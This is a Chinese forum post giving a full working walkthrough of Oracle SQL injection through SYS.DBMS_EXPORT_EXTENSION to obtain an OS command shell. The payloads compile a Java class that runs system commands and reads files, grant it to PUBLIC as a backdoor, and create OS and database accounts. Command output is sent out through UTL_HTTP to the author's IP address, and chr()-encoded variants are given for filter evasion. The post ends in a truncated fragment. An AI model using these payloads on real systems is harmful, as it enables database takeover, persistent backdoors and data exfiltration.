
标题: 实例演示oracle注入获取cmdshell的全过程

作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的；在web注入时，把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

的形式即可。（用 'a'|| 是为了让整个条件恒为true：'1'<>'a'||子查询结果 无论函数返回什么（包括NULL）都成立，但子查询仍然会被求值，注入的PL/SQL因此得以执行。）
语句有点长，可能要用post提交。
背景说明：这里利用的是 SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES 中的PL/SQL注入——该包归SYS所有、以定义者权限运行，且默认对PUBLIC授予了执行权限，所以在第三个参数里用 " 闭合引号后拼进去的PL/SQL块会以SYS的身份执行。Oracle已在2006年的Critical Patch Update中修复，只对未打补丁的旧版本实例有效；动手前先确认目标的版本和补丁级别。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在oracle上创建Java包LinxUtil，里面两个函数：runCMD用于执行系统命令，readFile用于读取文件。
注意：runCMD 用的是 Runtime.exec(String) 单字符串形式，不经过shell，所以管道、重定向等写法在Unix上不会生效（要自己拼成 /bin/sh -c ...），Windows上则要像下文一样带上 cmd /c；它只读取了stdout，stderr里的内容不会回显。命令最终是以运行Oracle服务的操作系统账号身份执行的（Windows上通常是SYSTEM或专用服务账号），与数据库账号无关。
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
------------------------
如果url有长度限制，可以把readFile()函数块去掉，即:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
同时把后面步骤中对readFile()的处理语句（第3步创建LinxReadFile、第4步对它的grant、第5步对它的检查）去掉。
------------------------------
2.赋Java权限
注意：这一步给 PUBLIC（也就是所有数据库用户）授予了对 <<ALL FILES>> 的 java.io.FilePermission，而且是持久的，后面第7步的清理并不会收回它，事后要用 dbms_java.revoke_permission 撤销。另外这里只授予了 execute 动作；readFile() 读文件需要的是 read 动作，如果类不是以SYS的权限运行，读文件会抛 AccessControlException（以 e.toString() 的字符串形式返回），需要的话把动作改成 ''''''''read,execute''''''''。
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
（注入的PL/SQL以SYS身份执行，所以这两个函数会建在SYS schema下，后面调用时要写成 sys.LinxRunCMD / sys.LinxReadFile。）
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
注意：grant ... to public 之后，这个实例上任何一个能登录的数据库账号都可以借这两个函数以Oracle服务账号的身份执行系统命令、读取任意文件，相当于给整个实例留了一个后门；测试结束务必撤销（第7步只drop了LinxRunCMD，LinxReadFile和授权都要另行清理）。
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
（对象不存在时子查询返回NULL，条件为假，页面表现和 id=1 and 1=2 一样；对象存在时条件为真。）
6.执行命令:
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
注意：net user linx /add 会在数据库主机上真实创建一个操作系统账号，是明显且持久的痕迹；验证时优先用没有副作用的命令（如 whoami、ipconfig），用了有副作用的命令要在结束后清理。
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)
注意sys.LinxReadFile()返回的是varchar类型，不能用 "and 1<>" 代替 "and '1'<>"（前者会让Oracle把文件内容隐式转换成数字，一般直接报转换错误）。
如果要查看运行结果可以用 union（列数和类型要和原查询匹配）:
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用UTL_HTTP.request 把结果带外发到自己控制的主机（下面的 211.71.147.3 是作者的接收端，使用时换成自己的）:
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
)
注意：用UTL_HTTP.request时，要用 REPLACE() 把空格、换行符替换掉，否则会无法提交http request。但Oracle的字符串字面量没有反斜杠转义，上面的 '\n' 匹配的是"反斜杠+n"两个字符而不是换行；Java那边拼进去的是真正的换行符，所以应改用 chr(10)（Windows命令输出还可能带 chr(13)）来替换。用utl_encode.base64_encode也可以，不过它的输入输出都是RAW，要配合 utl_raw.cast_to_raw / utl_raw.cast_to_varchar2 使用。
--------------------
6.内部变化
通过以下命令可以查看all_objects表的改变（Java源是用双引号 "LinxUtil" 创建的，名字保留大小写，所以要同时匹配 '%Linx%'）:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
注意：这一步只删了LinxRunCMD。LinxReadFile、Java源 "LinxUtil"（drop java source "LinxUtil"）、第2步授予PUBLIC的FilePermission（dbms_java.revoke_permission）以及第6步创建的操作系统账号linx都还留在目标上，清理时要一并处理。
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法（不执行系统命令，只验证注入是否真的以SYS权限生效）:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即（同一语句的 chr() 编码形式，可用于绕过对单引号的过滤；注意这一版用的是 PUT(:P1)，而且因为第三个参数不再嵌在SQL字符串里，里面的引号层数减半，解码后为 DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''CREATE USER linxsql IDENTIFIED BY linxsql'';END;';END;-- ）:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在（用户创建成功则子查询非空、条件为真）:
1<>(
select user_id from all_users where username='LINXSQL'
)
给linxsql连接权限（这会在目标上留下一个口令已知的账号，测试完务必执行下面的删除）:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query()，执行成功的话返回数值"1"。但它声明了 authid current_user（调用者权限），execute immediate 里的语句是以调用者而不是SYS的权限执行的；web应用的连接账号可能只有很低的权限，所以作用似乎不大。真的要用的话，可以考虑先通过上面的注入 grant dba to 当前的User:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)
（原帖此处之后的内容已截断，只剩下一个残缺片段，无法复原：）
and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE



